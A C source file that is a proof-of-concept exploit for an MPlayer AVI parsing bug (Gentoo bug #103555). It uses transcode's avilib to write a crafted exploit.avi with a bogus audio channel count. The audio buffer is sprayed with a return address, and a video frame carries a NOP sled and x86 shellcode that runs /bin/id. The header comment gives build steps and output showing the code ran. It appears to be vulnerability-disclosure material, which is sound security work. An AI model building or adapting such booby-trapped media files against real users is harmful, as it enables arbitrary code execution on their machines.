#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include "avilib.h"

/*
 * quick mplayer poc for bug #103555, avilib comes from transcode.
 *
 * $ tar -zxvf /usr/portage/distfiles/transcode-0.6.14.tar.gz
 * $ cd transcode-0.6.14/avilib/
 * $ gcc /path/to/poc.c avilib.c -I. -I../libxio -o exploit
 * $ ./exploit
 * info: exploit.avi has been created.
 * $ mplayer exploit.avi
 * $ mplayer -vo sdl -really-quiet exploit.avi
 * MPlayer 1.0pre6-3.3.5-20050130 (C) 2000-2004 MPlayer Team
 * CPU: Intel Pentium 4/Xeon/Celeron Foster (Family: 8, Stepping: 9)
 * Detected cache-line size is 64 bytes
 * MMX2 supported but disabled
 * CPUflags:  MMX: 1 MMX2: 0 3DNow: 0 3DNow2: 0 SSE: 1 SSE2: 1
 * Compiled for x86 CPU with extensions: MMX SSE SSE2
 *
 * 73 audio & 180 video codecs
 * SDL: Using driver: x11
 * SDL: deactivating XScreensaver/DPMS
 * SDL: X11 Resolution 1280x1024
 * SDL: Using 0x32315659 (Planar YV12) image format
 * SDL: using hardware-surface
 * uid=1000(taviso) gid=100(users) groups=10(wheel),100(users),250(portage)
 *
 * notice crazy number of channels in audio attributes.
 *
 *  -taviso@gentoo.org
 */

/* media-video/mplayer-1.0_pre6-r4 on kernel 2.6.7 */
#define RET_ADDR 0x874ada8
#define OUTPUT_FILE "exploit.avi"
#define VBUF_SIZE 8192

/* execve() /bin/id */
unsigned char shellcode[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3"
"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc"
"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07"
"\x9f\xcf\x2d\x8e";

int main(int argc, char **argv)
{
	unsigned char abuf[8192], *vbuf;
	avi_t *avifile;
	int i, *p;

	/* open output file */
	avifile = AVI_open_output_file(OUTPUT_FILE);

	/* set attributes */
	AVI_set_video(avifile, 156, 88, 10.0, "cvid");
	AVI_set_audio(avifile, 65025, 11025, 8, 1, 0);

	/* prepare and write audio buffer */
	for (p = (int *)(abuf + 3); 
			(void *)p <= (void *)&abuf[sizeof (abuf) - 1] - sizeof (void *); p++)
		*p = RET_ADDR;
	for (i = 0; i < 64; i++)
		AVI_write_audio(avifile, abuf, sizeof (abuf));

	/* prepare and write video buffer */
	vbuf = (unsigned char *) malloc (VBUF_SIZE);
	memset(vbuf, 0x90, VBUF_SIZE);
	memcpy(vbuf + VBUF_SIZE - sizeof (shellcode), shellcode, sizeof (shellcode));
	AVI_write_frame(avifile, vbuf, VBUF_SIZE, 0);

	/* write avi header */
	AVI_close(avifile);

	fprintf(stdout, "info: %s has been created.\n", OUTPUT_FILE);
	return 0;
}